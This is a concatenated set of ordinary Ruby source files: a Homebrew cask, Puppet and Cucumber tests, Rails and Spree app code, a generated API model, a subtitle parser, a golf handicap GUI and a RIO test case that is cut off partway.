url "http://beta.unity3d.com/download/2c4679632cfb/MacEditorTargetInstaller/UnitySetup-Vuforia-AR-Support-for-Editor-2018.1.0b6.pkg"
name 'Vuforia Augmented Reality Support'
homepage 'https://unity3d.com/unity/'
pkg 'UnitySetup-Vuforia-AR-Support-for-Editor-2018.1.0b6.pkg'
depends_on cask: '[email protected]'
preflight do
if File.exist? "/Applications/Unity"
FileUtils.move "/Applications/Unity", "/Applications/Unity.temp"
end
if File.exist? "/Applications/Unity-2018.1.0b6"
FileUtils.move "/Applications/Unity-2018.1.0b6", '/Applications/Unity'
end
end
postflight do
if File.exist? '/Applications/Unity'
FileUtils.move '/Applications/Unity', "/Applications/Unity-2018.1.0b6"
end
if File.exist? '/Applications/Unity.temp'
FileUtils.move '/Applications/Unity.temp', '/Applications/Unity'
end
end
uninstall quit: 'com.unity3d.UnityEditor5.x',
delete: '/Applications/Unity-2018.1.0b6/PlaybackEngines/VuforiaSupport'
end
| 31.416667 | 134 | 0.71618 |
26d0cd8e191fd45911d25bffdc5195976ead7616 | 2,715 | require 'spec_helper_acceptance'
describe 'lbvserver tests' do
it 'makes a lbvserver' do
pp = <<-EOS
netscaler_lbvserver { '1_8_lbvserver1':
ensure => 'present',
service_type => 'DNS',
state => true,
}
EOS
make_site_pp(pp)
run_device(allow_changes: true)
run_device(allow_changes: false)
end
it 'makes and edits a lbvserver' do
pp = <<-EOS
netscaler_lbvserver { '1_8_lbvserver2':
ensure => 'present',
service_type => 'HTTP',
ip_address => '1.8.2.1',
port => '8080',
state => true,
}
EOS
make_site_pp(pp)
run_device(allow_changes: true)
run_device(allow_changes: false)
pp = <<-EOS
netscaler_lbvserver { '1_8_lbvserver2':
ensure => 'present',
service_type => 'HTTP',
ip_address => '1.8.2.2',
port => '8080',
state => true,
}
EOS
make_site_pp(pp)
run_device(allow_changes: true)
run_device(allow_changes: false)
end
it 'makes and deletes a lbvserver' do
pp = <<-EOS
netscaler_lbvserver { '1_8_lbvserver3':
ensure => 'present',
service_type => 'HTTP',
ip_address => '1.8.3.1',
port => '8080',
state => true,
}
EOS
make_site_pp(pp)
run_device(allow_changes: true)
run_device(allow_changes: false)
pp = <<-EOS
netscaler_lbvserver { '1_8_lbvserver3':
ensure => 'absent',
}
EOS
make_site_pp(pp)
run_device(allow_changes: true)
run_device(allow_changes: false)
end
it 'makes and disables/enables a lbvserver' do
pp = <<-EOS
netscaler_lbvserver { '1_8_lbvserver4':
ensure => 'present',
service_type => 'HTTP',
ip_address => '1.8.4.1',
port => '8080',
state => 'ENABLED',
}
EOS
make_site_pp(pp)
run_device(allow_changes: true)
run_device(allow_changes: false)
pp2 = <<-EOS
netscaler_lbvserver { '1_8_lbvserver4':
ensure => 'present',
service_type => 'HTTP',
ip_address => '1.8.4.1',
port => '8080',
state => 'DISABLED',
}
EOS
pp3 = <<-EOS
netscaler_lbvserver { '1_8_lbvserver4':
ensure => 'present',
service_type => 'HTTP',
ip_address => '1.8.4.1',
port => '8080',
state => 'ENABLED',
}
EOS
make_site_pp(pp)
run_device(allow_changes: true)
make_site_pp(pp2)
run_device(allow_changes: true)
run_device(allow_changes: false)
make_site_pp(pp3)
run_device(allow_changes: true)
run_device(allow_changes: false)
end
end
| 24.241071 | 48 | 0.561326 |
5d54f065e5005e8750e867c1157f468cb7c88193 | 641 | module Spree
module Admin
class MakesController < ResourceController
#Is this supposed to be a controller for the makes of cars?
def index
respond_with(@collection)
end
private
def collection
return @collection if @collection.present?
# params[:q] can be blank upon pagination
params[:q] = {} if params[:q].blank?
@collection = super
@search = @collection.ransack(params[:q])
@collection = @search.result.
page(params[:page]).
per(Spree::Config[:properties_per_page])
@collection
end
end
end
end
| 22.892857 | 65 | 0.595944 |
26ca919fd3d2e43e53caa33dff91cd4ecce46938 | 6,255 | require_relative "steps_helper"
# Cenario: Cadastro realizado com sucesso (Caminho Feliz)
Given("Eu sou o Administrador") do
cria_administrador
end
Given("Eu sou Administrador") do
cria_administrador
end
Given("Eu estou logado") do
cria_administrador
fazer_login_Adm
end
When("Eu acesso pagina de criar um novo medico") do
cria_administrador
fazer_login_Adm
visit '/medicos/new'
expect(page).to have_content("Cadastrar Novo Medico");
end
When("Eu acesso pagina de criar um novo medico sem estar logado") do
visit '/medicos/new'
end
When("envio o formulario de medico com dados validos") do
cria_administrador
fazer_login_Adm
visit '/medicos/new'
expect(page).to have_content("Cadastrar Novo Medico");
cria_medico_valido
preencherCamposMedico(@medicovalido)
# find(:xpath, "/html/body/form/div[9]/input").click
find(:xpath, "/html/body/div/div/form/div[9]/input").click
end
Then("na pagina principal recebo a mensagem de Medico cadastrado com sucesso!") do
cria_administrador
fazer_login_Adm
visit '/medicos/new'
cria_medico_valido
preencherCamposMedico(@medicovalido)
# find(:xpath, "/html/body/form/div[9]/input").click
find(:xpath, "/html/body/div/div/form/div[9]/input").click
expect(page).to have_content("Medico was successfully created.")
end
# Cenario: Cadastro com dados obrigatorios faltando
#ambiguidade com Eu sou administrador la em cima
#Given("Eu sou Administrador") do
# cria_administrador
# fazer_login_Adm
#end
When ("envio o form de novo medico com todos os campos em branco") do
cria_administrador
fazer_login_Adm
visit '/medicos/new'
medico_sem_dado_no_form
# find(:xpath, "/html/body/form/div[9]/input").click
end
Then ("recebo mensagems de erro na pagina de cadastro de medico para os seguintes campos:") do |table|
# table is a Cucumber::MultilineArgument::DataTable
medico_sem_dado_no_form
linhas = table.raw
linhas.each do |linha|
expect(page).to have_content(linha[0])
end
end
# Cenario: Acesso direto sem estar logado
Given("Eu sou um convidado") do
cria_convidado
end
#Considerado ambiguo com Eu nao estou logado em usuarios
#Given("Eu nao estou logado") do
# cria_convidado
# visit '/users/sign_out'
#end
#Given("Eu acesso pagina de criar um novo medico") do
# cria_convidado
# visit '/users/sign_out'
# visit '/medicos/new'
#end
#Ambiguo com frase acima
#Then("recebo mensagem de erro na pagina de cadastro de medico") do
# pending # Write code here that turns the phrase above into concrete actions
#end
Then("sou redirecionada para a pagina de login de usuario") do
#cria_convidado
#cria_convidado
#visit '/'
#visit '/usuarios/sign_out"'
#find(:xpath,"/html/body/div[2]/div/div[1]/a[4]").click;
visit '/medicos/new'
expect(page).to have_content("pido - ACESSAR");
expect(page).to have_content("Esqueceu sua senha?");
expect(page).to have_content("Criar sua conta");
end
# Cenario: Editar Medico com especialidade repetida
When("Eu cadastro uma especialidade") do
cria_administrador
fazer_login_Adm
visit '/especialidades/new'
cria_especialidade_valida
preencherCamposEspecialidade(@especialidadevalida)
#Qdo configura o bootstrap na pagina o xpath muda
find(:xpath, "/html/body/form/div[4]/input").click
expect(page).to have_content("Especialidade was successfully created.")
end
When("Eu cadastro um medico com esta especialidade") do
#os passos que criam a especialidade estao repedidos aqui
#porque o cucumber permite controlar o estado da aplicacao "entre paginas"
#apenas dentro de um passo e nao entre passos.
#apesar do problema do DRY essa operacao esta testada no passo anterior
#cadastra a especialidade
#cria_administrador
#fazer_login_Adm
#visit '/especialidades/new'
#cria_especialidade_valida
#preencherCamposEspecialidade(@especialidadevalida)
#Qdo configura o bootstrap na pagina o xpath muda
#find(:xpath, "/html/body/form/div[4]/input").click
#incrivelmente funcionou entre passos... deixei os comentarios aqui pra
#levantar essa questao...
#cadastra um medico, agora com a especialidade cadastrada anteriormente
visit '/medicos/new'
expect(page).to have_content("Cadastrar Novo Medico");
cria_medico_valido
preencherCamposMedicoESelecionaUmaEspecialidade(@medicovalido)
#page.should have_css('#esp_ortopedista[value='1']')
find(:css, "#esp_EspecialidadeBemIncomumPraTeste").set(true)
find(:xpath, "/html/body/div/div/form/div[9]/input").click
expect(page).to have_content("Medico was successfully created.")
expect(page).to have_content("Voltar")
page.should have_css("a[href='/medicos']")
expect(page).to have_content("EspecialidadeBemIncomumPraTeste") #Significa que o medico tem essa especialidade
find(:css, "a[href='/medicos']").click
end
When("Eu clico em voltar para ir ate a pagina que lista medicos") do
visit '/medicos'
expect(page).to have_content("EspecialidadeBemIncomumPraTeste") #Significa que o medico tem essa especialidade
expect(page).to have_content("Medico X2"); # que he o nome do medico que eu cadastrei nos passos anteriore
end
When("Eu clico em editar o medico que eu inseri") do
expect(page).to have_content("Medico X2") # o ultimo medico valido inserido tem esse nome
expect(page).to have_content("EspecialidadeBemIncomumPraTeste") #A o medico tinha sido editado pra ter essa especialidade
#Aqui a gente clica no editar do metido que inserimos
find(:xpath, "/html/body/div/div/table/tbody/tr[4]/td[11]/a").click #fix-me: Deveria haver so um medico listado, tem 4
end
When("Eu seleciono a mesma especialidade existente que o medico ja tem") do
#Na pagina de edicao do medico a gente seleciona a mesma especialidade que o medico ha tem pra adicionar ela de novo
find(:xpath,"//*[@id='esp_EspecialidadeBemIncomumPraTeste']").click
end
When("Eu clico em atualizar medico") do
#E clicamos em atualizar
find(:xpath,"/html/body/div/div/form/div[9]/input").click
end
Then("Recebo a msg medico atualizado com sucesso mas sem especialidades repetidas") do
expect(page).to have_no_content("EspecialidadeBemIncomumPraTeste EspecialidadeBemIncomumPraTeste")
expect(page).to have_content("Medico was successfully updated.")
end
| 32.409326 | 123 | 0.755556 |
6a269be9c979063984b0b04f7bebe72e81d34cd7 | 12,773 | =begin
#Hydrogen Nucleus API
#The Hydrogen Nucleus API
OpenAPI spec version: 1.9.4
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.19
=end
require 'date'
module NucleusApi
# BankLink Object
class BankLink
# accountId
attr_accessor :account_id
# availableBalance
attr_accessor :available_balance
# balance
attr_accessor :balance
# bankAccountHolder
attr_accessor :bank_account_holder
# bankAccountName
attr_accessor :bank_account_name
# bankAccountNumber
attr_accessor :bank_account_number
# businessId
attr_accessor :business_id
# clientId
attr_accessor :client_id
attr_accessor :create_date
# currencyCode
attr_accessor :currency_code
attr_accessor :id
# institutionId
attr_accessor :institution_id
# institutionName
attr_accessor :institution_name
# isActive
attr_accessor :is_active
# isDefault
attr_accessor :is_default
# isLinkVerified
attr_accessor :is_link_verified
# linkVerifiedDate
attr_accessor :link_verified_date
# mask
attr_accessor :mask
attr_accessor :metadata
# routing
attr_accessor :routing
# routingWire
attr_accessor :routing_wire
attr_accessor :secondary_id
# type
attr_accessor :type
attr_accessor :update_date
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'account_id' => :'account_id',
:'available_balance' => :'available_balance',
:'balance' => :'balance',
:'bank_account_holder' => :'bank_account_holder',
:'bank_account_name' => :'bank_account_name',
:'bank_account_number' => :'bank_account_number',
:'business_id' => :'business_id',
:'client_id' => :'client_id',
:'create_date' => :'create_date',
:'currency_code' => :'currency_code',
:'id' => :'id',
:'institution_id' => :'institution_id',
:'institution_name' => :'institution_name',
:'is_active' => :'is_active',
:'is_default' => :'is_default',
:'is_link_verified' => :'is_link_verified',
:'link_verified_date' => :'link_verified_date',
:'mask' => :'mask',
:'metadata' => :'metadata',
:'routing' => :'routing',
:'routing_wire' => :'routing_wire',
:'secondary_id' => :'secondary_id',
:'type' => :'type',
:'update_date' => :'update_date'
}
end
# Attribute type mapping.
def self.swagger_types
{
:'account_id' => :'String',
:'available_balance' => :'Float',
:'balance' => :'Float',
:'bank_account_holder' => :'String',
:'bank_account_name' => :'String',
:'bank_account_number' => :'String',
:'business_id' => :'String',
:'client_id' => :'String',
:'create_date' => :'DateTime',
:'currency_code' => :'String',
:'id' => :'String',
:'institution_id' => :'String',
:'institution_name' => :'String',
:'is_active' => :'BOOLEAN',
:'is_default' => :'BOOLEAN',
:'is_link_verified' => :'BOOLEAN',
:'link_verified_date' => :'Date',
:'mask' => :'String',
:'metadata' => :'Hash<String, String>',
:'routing' => :'String',
:'routing_wire' => :'String',
:'secondary_id' => :'String',
:'type' => :'String',
:'update_date' => :'DateTime'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
if attributes.has_key?(:'account_id')
self.account_id = attributes[:'account_id']
end
if attributes.has_key?(:'available_balance')
self.available_balance = attributes[:'available_balance']
end
if attributes.has_key?(:'balance')
self.balance = attributes[:'balance']
end
if attributes.has_key?(:'bank_account_holder')
self.bank_account_holder = attributes[:'bank_account_holder']
end
if attributes.has_key?(:'bank_account_name')
self.bank_account_name = attributes[:'bank_account_name']
end
if attributes.has_key?(:'bank_account_number')
self.bank_account_number = attributes[:'bank_account_number']
end
if attributes.has_key?(:'business_id')
self.business_id = attributes[:'business_id']
end
if attributes.has_key?(:'client_id')
self.client_id = attributes[:'client_id']
end
if attributes.has_key?(:'create_date')
self.create_date = attributes[:'create_date']
end
if attributes.has_key?(:'currency_code')
self.currency_code = attributes[:'currency_code']
end
if attributes.has_key?(:'id')
self.id = attributes[:'id']
end
if attributes.has_key?(:'institution_id')
self.institution_id = attributes[:'institution_id']
end
if attributes.has_key?(:'institution_name')
self.institution_name = attributes[:'institution_name']
end
if attributes.has_key?(:'is_active')
self.is_active = attributes[:'is_active']
end
if attributes.has_key?(:'is_default')
self.is_default = attributes[:'is_default']
end
if attributes.has_key?(:'is_link_verified')
self.is_link_verified = attributes[:'is_link_verified']
end
if attributes.has_key?(:'link_verified_date')
self.link_verified_date = attributes[:'link_verified_date']
end
if attributes.has_key?(:'mask')
self.mask = attributes[:'mask']
end
if attributes.has_key?(:'metadata')
if (value = attributes[:'metadata']).is_a?(Hash)
self.metadata = value
end
end
if attributes.has_key?(:'routing')
self.routing = attributes[:'routing']
end
if attributes.has_key?(:'routing_wire')
self.routing_wire = attributes[:'routing_wire']
end
if attributes.has_key?(:'secondary_id')
self.secondary_id = attributes[:'secondary_id']
end
if attributes.has_key?(:'type')
self.type = attributes[:'type']
end
if attributes.has_key?(:'update_date')
self.update_date = attributes[:'update_date']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
if @bank_account_holder.nil?
invalid_properties.push('invalid value for "bank_account_holder", bank_account_holder cannot be nil.')
end
if @bank_account_number.nil?
invalid_properties.push('invalid value for "bank_account_number", bank_account_number cannot be nil.')
end
if @institution_name.nil?
invalid_properties.push('invalid value for "institution_name", institution_name cannot be nil.')
end
if @routing.nil?
invalid_properties.push('invalid value for "routing", routing cannot be nil.')
end
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if @bank_account_holder.nil?
return false if @bank_account_number.nil?
return false if @institution_name.nil?
return false if @routing.nil?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
account_id == o.account_id &&
available_balance == o.available_balance &&
balance == o.balance &&
bank_account_holder == o.bank_account_holder &&
bank_account_name == o.bank_account_name &&
bank_account_number == o.bank_account_number &&
business_id == o.business_id &&
client_id == o.client_id &&
create_date == o.create_date &&
currency_code == o.currency_code &&
id == o.id &&
institution_id == o.institution_id &&
institution_name == o.institution_name &&
is_active == o.is_active &&
is_default == o.is_default &&
is_link_verified == o.is_link_verified &&
link_verified_date == o.link_verified_date &&
mask == o.mask &&
metadata == o.metadata &&
routing == o.routing &&
routing_wire == o.routing_wire &&
secondary_id == o.secondary_id &&
type == o.type &&
update_date == o.update_date
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[account_id, available_balance, balance, bank_account_holder, bank_account_name, bank_account_number, business_id, client_id, create_date, currency_code, id, institution_id, institution_name, is_active, is_default, is_link_verified, link_verified_date, mask, metadata, routing, routing_wire, secondary_id, type, update_date].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
self.class.swagger_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
(value)
when :Date
(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
temp_model = NucleusApi.const_get(type).new
temp_model.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 29.56713 | 335 | 0.617866 |
bbe8e56f205798b536fee60d7302762105abe478 | 1,156 | require_relative './sub_track.rb'
module SubsParsers
class VttParser
# Parses VTT formatted files and returns
# an array of SubTrack
#
# @param [File]
# @return [Array(SubTrack)]
def get_subs(file)
subs = []
track_line = ''
track_subs = []
file.each_line do |line|
if /^((\d\d:)?\d\d:\d\d\.\d+\s-->\s)/.match?(line)
track_line = line
elsif !track_line.empty? && line.eql?("\n")
subs.push(create_sub_track(track_line, track_subs))
track_line = ''
track_subs = []
elsif !track_line.empty?
track_subs.push(line)
else
track_line = ''
track_subs = []
end
end
if !track_subs.empty? && !track_subs.empty?
subs.push(create_sub_track(track_line, track_subs))
end
subs
end
def format_name()
"vtt"
end
private
def create_sub_track(track_line, subs)
case track_line.split('-->')
in [start_time, end_time]
SubsParsers::SubTrack.new(start_time.strip(), end_time.strip(), subs.join("").strip())
end
end
end
end | 23.12 | 96 | 0.560554 |
d5c9fb3c7df63a0d2f49e605495b380bde98a023 | 157 | class AddRoleToUsers < ActiveRecord::Migration[5.1]
def change
add_column :users, :role, :integer, null: false, after: :username, default: 0
end
end
| 26.166667 | 81 | 0.719745 |
bb7f7fb65fcf7a377b17a152a6ed2d9b83b40537 | 3,403 | class Handicap
include GladeGUI
def initialize()
@scores = []
end
def before_show()
@view = VR::ListView.new(rnd: String, date: VR::Col::CalendarCol,
course: String, rating_slope: String, score: String, diff: Score,
hcp: String)
@view.col_xalign(diff: 1, hcp: 1, score: 1)
@view.col_sortable(date: true, course: true)
@view.show
golfer_file = File.basename(@vr_yaml_file, ".*")
golfer = golfer_file.split("_").map(&:capitalize).join(' ')
@builder[:name].label = "<big><big><big><big><big>#{golfer}</big></big></big></big></big>"
if File.exists?(golfer_file + ".jpg")
@builder[:image].file = golfer_file + ".jpg"
@builder[:image].visible = true
end
refresh()
end
def refresh()
update_handicaps
@view.model.clear
i = 1
@scores.each do |s|
row = @view.add_row()
row[:rnd] = "#{i}."
i += 1
row[:date] = VR::Col::CalendarCol.new(s.date, :format => "%d %b %Y ", :hide_time=>true, :hide_date => false)
row[:course] = s.course_name
row[:score] = s.score
row[:rating_slope] = "#{s.course_rating.to_s}/#{s.course_slope.to_s}"
row[:diff] = s
row[:hcp] = s.handicap
end
end
def buttonAdd__clicked(*a)
if row = @view.selected_rows.first
course = row[:course]
rating, slope = row[:rating_slope].split("/")
else
course = rating = slope = ""
end
score = Score.new(course, rating, slope)
score.show_glade
if !score.used.nil? and score.score.to_i > 50
@scores << score
@scores.sort! { |x,y| y.date <=> x.date }
refresh()
end
end
def update_handicaps
@scores.each_index do |i|
fill_handicap(@scores[@[email protected]])
end
@scores.each {|s| s.used = ""}
fill_handicap(@scores)
@builder[:handicap].label = "<big><big><big><big><big><big><big><big>#{@scores[0].handicap}</big></big></big></big></big></big></big></big>" if @scores[0]
end
def fill_handicap(score_array)
score_ar = score_array.size > 20 ? score_array[0..19] : score_array
count = use_count(score_ar) # number of scores to use for handicap
best_scores = score_ar.sort { |x,y| x.diff <=> y.diff }
best_scores = count > 0 ? best_scores[0..count-1] : []
best_scores.each {|s| s.used = "y"}
tot = best_scores.inject(0) { |sum, s| sum + s.diff }
x = (0.96*tot/count).to_s
score_array[0].handicap = count > 0 ? x[0..x.index(".")+1] : "n/a" if score_array[0]
end
def buttonChangeGolfer__clicked(*a)
@view = nil # so it doesn't save contents
VR::save_yaml(self)
@builder[:window1].destroy
load_new_golfer
end
def window1__delete_event(*)
@view = nil
VR::save_yaml(self)
return false #ok to close
end
def use_count(score_ar)
if score_ar.size > 20
return 10
else
return [0,0,0,0,1,1,2,2,3,3,4,4,5,5,6,6,7,8,9,10][score_ar.size-1]
end
end
def buttonDelete__clicked(*a)
return unless row = @view.selected_rows.first
if alert("Are you sure you want to delete this score?", button_yes: "Delete", button_no: "Cancel")
@scores.delete(row[:diff])
refresh
end
end
def buttonEditScore__clicked(*a)
return unless row = @view.selected_rows.first
row[:diff].show_glade
@scores.sort! { |x,y| y.date <=> x.date }
refresh
end
end
| 29.336207 | 158 | 0.604761 |
182cfcf4c1e49fced0a9c2928aac8d5e51769e19 | 92 | name 'mapr_tasktracker'
description 'MapR tasktracker'
run_list *%w[
role[mapr]
]
| 13.142857 | 30 | 0.684783 |
f76fbd32ac46616f140cce171abc61ba7a592143 | 471 | log_level :info
log_location STDOUT
node_name 'venkat'
client_key '/home/venkat/chef-cookbooks/.chef/venkat.pem'
validation_client_name 'chef-validator'
validation_key '/home/venkat/chef-cookbooks/chef-validator.pem'
chef_server_url 'https://chef-server.venkat.com:443'
syntax_check_cache_path '/root/chef-repo/.chef/syntax_check_cache'
cookbook_path '/home/venkat/chef-cookbooks/cookbooks'
| 47.1 | 73 | 0.687898 |
8775ad321b5ad2bcb3cc426cb4bcd369701d61f8 | 44 | module Transferwise
VERSION = "0.2.6"
end
| 11 | 19 | 0.704545 |
08f0c7bfab0798e172b8f3b9191f08ba1a21df52 | 521 | Spree::Core::Engine.routes.draw do
namespace :admin do
resources :dhl_shipping_methods do
resources :dhl_shipping_zones, only: [:index, :new, :create]
resources :dhl_surcharges, only: [:index, :new, :create]
end
resources :dhl_shipping_zones, except: [:index, :new, :create] do
resources :dhl_country_zones, only: [:index, :new, :create]
end
resources :dhl_surcharges, except: [:index, :new, :create]
resources :dhl_country_zones, except: [:index, :new, :create]
end
end
| 28.944444 | 69 | 0.679463 |
38845ff2e2ddebdb81c8998455572b02757272ff | 3,026 | class User < ApplicationRecord
include Gravtastic
gravtastic
# 仮想の属性を作成 #has_secure_passwordの場合は(password属性)自動生成される
# remember_digestとセット
attr_accessor :remember_token, :activation_token, :reset_token
# メソッド参照の方が良い(before_action)
before_save :downcase_email
before_create :create_activation_digest
validates :name, presence: true, length: { maximum: 50 }
VALID_EMAIL_REGEX = /\A[\w+\-.]+@[a-z\d\-]+(\.[a-z\d\-]+)*\.[a-z]+\z/i
validates :email, presence: true, length: { maximum: 255 },
format: { with: VALID_EMAIL_REGEX },
uniqueness: { case_sensitive: false }
has_secure_password
# allow_nil: trueはプロフィール更新時パスワードがnilでもtrueになる
validates :password, presence: true, length: { minimum: 6 }, allow_nil: true
validates :a_word, length: { maximum: 30 }
validates :introduction, length: { maximum: 100 }
# 定義する事によりfixtureを作成できるようになる
# 渡された文字列のハッシュ値を返す
def self.digest(string) #self = Userクラスを指す
cost = ActiveModel::SecurePassword.min_cost ? BCrypt::Engine::MIN_COST :
BCrypt::Engine.cost
BCrypt::Password.create(string, cost: cost)
end
# ランダムなトークンを返す
def self.new_token #self = Userクラスを指す
# SecureRandomモジュールにあるurlsafe_base64メソッド(記憶トークン作成)
SecureRandom.urlsafe_base64
end
# 永続セッションのためにユーザーをデータベースに記憶する
def remember
# selfを使う事によってremember_tokenのローカル変数が作成されない
# selfは現在のユーザーを指す
self.remember_token = User.new_token
# 記憶ダイジェストを更新(バリデーション素通りさせる)
# 既にデータベースにいるユーザーに対して行う
update_attribute(:remember_digest, User.digest(remember_token))
end
# 抽象化された
# 渡されたトークンがダイジェストと一致したらtrueを返す (remember_token)はローカル変数
def authenticated?(attribute, token)
digest = send("#{attribute}_digest")
# 記憶digestがnilの場合falseを返しreturnで終了(ログアウトした場合2重でloginは不可)
return false if digest.nil?
BCrypt::Password.new(digest).is_password?(token)
end
# ユーザーのログイン情報を破棄する
def forget
update_attribute(:remember_digest, nil)
end
# アカウントを有効にする
def activate
# update_columnsを使うと二行のupdate_attributeを一行で表示できる
update_columns(activated: true, activated_at: Time.zone.now)
end
# 有効化用のメールを送信する
def send_activation_email
UserMailer.account_activation(self).deliver_now
end
# パスワード再設定の属性を設定する
def create_reset_digest
self.reset_token = User.new_token
# update_columnsメソッドを使うと一行にまとめる事が可能
update_attribute(:reset_digest, User.digest(reset_token))
update_attribute(:reset_at, Time.zone.now)
end
# パスワード再設定のメールを送信する
def password_reset_email
UserMailer.password_reset(self).deliver_now
end
# パスワード再設定の期限が切れている場合はtrueを返す
def password_reset_expired?
reset_at < 2.hours.ago
end
# 外部に公開する必要の無いものはこちら
private
# メールアドレスを全て小文字にする
def downcase_email
# selfは現在のユーザーを指す
self.email = email.downcase
end
# 有効化トークンとダイジェストを作成およびダイジェストにトークンを代入する
# 新しいユーザーの為に作成
def create_activation_digest
self.activation_token = User.new_token
self.activation_digest = User.digest(activation_token)
end
end
| 28.819048 | 78 | 0.737277 |
915f61c80048628d81b14223518a566ae1da3bb0 | 4,735 | #!/usr/local/bin/ruby
if $0 == __FILE__
Dir.chdir File.dirname(__FILE__)+'/../'
$:.unshift File.expand_path('../lib/')
end
require 'rio'
require 'tc/testcase'
require 'tmpdir'
class TC_riorl < Test::RIO::TestCase
@@once = false
def self.once
@@once = true
end
def setup
super
self.class.once unless @@once
@tmpdir = "#{::Dir::tmpdir}"
#p @tmpdir
@tmppath = "#{@tmpdir}/rio"
end
def pathinfo(ario)
h = {}
[:scheme,:opaque,:path,:fspath,:to_s,:to_url,:to_uri].each do |sym|
begin
h[sym] = ario.__send__(sym)
rescue
h[sym] = 'error'
end
end
h
end
def pinfo(fmt,pi)
printf(fmt, pi[:scheme].inspect,pi[:opaque].inspect,pi[:path].inspect,
pi[:fspath].inspect,pi[:to_s].inspect,pi[:to_url].inspect)
end
def mkrioinfo(astring)
rinfo = mksyminfo(astring)
rinfo[?-] = rinfo[:stdio]
rinfo[?=] = rinfo[:stderr]
rinfo[??] = rinfo[:temp]
rinfo[?"] = rinfo[:strio]
rinfo[?_] = rinfo[:sysio]
rinfo[?`] = rinfo[:cmdio]
rinfo[?#] = rinfo[:fd]
rinfo
end
def mksyminfo(astring)
rinfo = {
:stdio => ['stdio',"",nil,nil,"stdio:","stdio:"],
:stderr => ['stderr',"",nil,nil,"stderr:","stderr:"],
:temp => ['temp',@tmppath,nil,nil,"temp:#{@tmppath}","temp:#{@tmppath}"],
}
strpq = sprintf("0x%08x",astring.object_id)
rinfo[:strio] = ['strio',strpq,nil,nil,"strio:#{strpq}","strio:#{strpq}"]
siopq = sprintf("0x%08x",$stdout.object_id)
rinfo[:sysio] = ['sysio',siopq,nil,nil,"sysio:#{siopq}","sysio:#{siopq}"]
rinfo[:cmdio] = ['cmdio','echo%20x',nil,nil,'echo x','cmdio:echo%20x']
rinfo[:fd] = ['fd','1',nil,nil,'fd:1','fd:1']
rinfo
end
def mkrios1()
rinfo = mkrioinfo(astring="")
rios = {
?- => rio(?-),
?= => rio(?=),
?" => rio(?",astring),
?? => rio(??),
?_ => rio($stdout),
?` => rio(?`,'echo x'),
?# => rio(?#,1),
}
[rios,rinfo]
end
def mkrios_sym
rinfo = mksyminfo(astring="")
rios = {
:stdio => rio(:stdio),
:stderr => rio(:stderr),
:strio => rio(:strio,astring),
:temp => rio(:temp),
:sysio => rio(:sysio,$stdout),
:cmdio => rio(:cmdio,'echo x'),
:fd => rio(:fd,1),
}
[rios,rinfo]
end
def mkrios_modfunc
rinfo = mksyminfo(astring="")
rios = {
:stdio => RIO.stdio,
:stderr => RIO.stderr,
:strio => RIO.strio(astring),
:temp => RIO.temp,
:sysio => RIO.sysio($stdout),
:cmdio => RIO.cmdio('echo x'),
:fd => RIO.fd(1),
}
[rios,rinfo]
end
def mkrios_classmeth
rinfo = mksyminfo(astring="")
rios = {
:stdio => RIO::Rio.stdio,
:stderr => RIO::Rio.stderr,
:strio => RIO::Rio.strio(astring),
:temp => RIO::Rio.temp,
:sysio => RIO::Rio.sysio($stdout),
:cmdio => RIO::Rio.cmdio('echo x'),
:fd => RIO::Rio.fd(1),
}
[rios,rinfo]
end
def check_rios(rios,rinfo,fmt="%-12s %-12s %-8s %-8s %-20s %-20s\n")
#printf(fmt,'scheme','opaque','path','fspath','to_s','url')
rios.each do |k,r|
#pinfo(fmt,pathinfo(r))
assert_equal(rinfo[k][0],r.scheme)
